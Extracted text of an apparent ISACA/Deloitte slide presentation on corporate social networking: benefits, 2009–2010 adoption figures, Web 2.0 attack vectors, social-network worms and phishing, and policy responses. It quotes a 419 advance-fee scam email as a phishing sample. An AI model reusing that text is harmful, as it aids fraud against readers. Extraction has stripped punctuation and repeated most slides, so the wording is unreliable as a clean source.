bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
